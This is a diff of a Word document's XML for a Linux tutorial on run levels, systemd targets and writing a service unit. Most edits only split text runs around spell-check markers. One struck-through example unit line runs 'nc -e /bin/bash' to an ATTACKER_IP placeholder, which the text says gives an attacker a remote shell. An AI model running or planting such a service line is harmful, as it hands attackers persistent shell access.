           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>init</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -969,11 +1461,19 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init 2</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (console only).  </w:t>
@@ -993,12 +1493,14 @@
         </w:rPr>
         <w:t xml:space="preserve">udo </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>init</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1023,14 +1525,21 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">If you have the correct versions, try executing </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">init </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1101,11 +1610,19 @@
       <w:r>
         <w:t xml:space="preserve">If the VM captures your mouse and will not release it, hit </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>cntl-alt</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>cntl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>-alt</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> to get it back.  Here’s what the console looks like.</w:t>
@@ -1161,7 +1678,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>use sudo init 5</w:t>
+        <w:t xml:space="preserve">use sudo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> to get back to the desktop.</w:t>
@@ -1211,7 +1742,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The VM steals your mouse because VMware Tools (open-vm tools, really) are not running in console mode.</w:t>
+        <w:t>The VM steals your mouse because VMware Tools (open-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> tools, really) are not running in console mode.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1219,6 +1758,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Systemd basics</w:t>
       </w:r>
     </w:p>
@@ -1226,12 +1766,21 @@
       <w:r>
         <w:t xml:space="preserve">The closest systemd equivalent to </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
-        <w:t>chkconfig --list</w:t>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --list</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> from SysV is</w:t>
@@ -1259,7 +1808,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Note that if you use </w:t>
       </w:r>
       <w:r>
@@ -1721,7 +2269,43 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>[john@john ~]$ systemctl list-units --type target</w:t>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>john@john</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>~]$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> systemctl list-units --type target</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1751,13 +2335,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>basic.target           loaded active active Basic System</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>basic.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">           loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Basic System</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1769,13 +2383,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>cryptsetup.target      loaded active active Encrypted Volumes</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>cryptsetup.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Encrypted Volumes</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1787,13 +2431,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>getty.target           loaded active active Login Prompts</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>getty.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">           loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Login Prompts</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1805,13 +2479,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>graphical.target       loaded active active Graphical Interface</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Graphical Interface</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1829,7 +2533,27 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">local-fs-pre.target    </w:t>
+        <w:t>local-fs-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>pre.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1845,7 +2569,25 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> active active Local File Systems (Pre)</w:t>
+        <w:t xml:space="preserve"> active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Local File Systems (Pre)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1863,7 +2605,45 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>local-fs.target        loaded active active Local File Systems</w:t>
+        <w:t>local-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>fs.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Local File Systems</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1881,7 +2661,45 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>multi-user.target      loaded active active Multi-User System</w:t>
+        <w:t>multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Multi-User System</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1899,7 +2717,45 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>network-online.target  loaded active active Network is Online</w:t>
+        <w:t>network-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>online.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Network is Online</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1922,11 +2778,30 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In this case, both multi-user.target and graphical.target are active, so we must be in run level 5.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>In this case, both multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> are active, so we must be in run level 5.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>You can</w:t>
       </w:r>
       <w:r>
@@ -1942,7 +2817,17 @@
         <w:t>run level 3</w:t>
       </w:r>
       <w:r>
-        <w:t>”, where graphical.target is not running, by using</w:t>
+        <w:t xml:space="preserve">”, where </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is not running, by using</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -1952,13 +2837,22 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
-        <w:t>systemctl isolate multi-user.target</w:t>
-      </w:r>
+        <w:t>systemctl isolate multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
         <w:br/>
       </w:r>
       <w:r>
@@ -1967,8 +2861,27 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>This will cause all services required by the multi-user.target unit file to continue or start, as needed.  All services not required by multi-user.target (all the graphical stuff in our case) will be stopped.</w:t>
+        <w:t>This will cause all services required by the multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> unit file to continue or start, as needed.  All services not required by multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (all the graphical stuff in our case) will be stopped.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1989,8 +2902,19 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
-        <w:t>systemctl isolate graphical.target</w:t>
-      </w:r>
+        <w:t xml:space="preserve">systemctl isolate </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2021,7 +2945,14 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -na</w:t>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>na</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2029,6 +2960,7 @@
         </w:rPr>
         <w:t>t</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -2142,12 +3074,53 @@
       <w:r>
         <w:br/>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:strike/>
         </w:rPr>
-        <w:t>ExecStart=/usr/bin/nc -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
+        <w:t>ExecStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t>=/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2183,8 +3156,16 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>machine and gives the attacker a remote shell (ouch</w:t>
-      </w:r>
+        <w:t>machine and gives the attacker a remote shell (</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">more complicated than what we need </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>at the moment</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -2213,11 +3194,33 @@
       <w:r>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ExecStart=/bin/nc -l 1234</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ExecStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>=/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l 1234</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2228,7 +3231,15 @@
     </w:p>
     <w:p>
       <w:r>
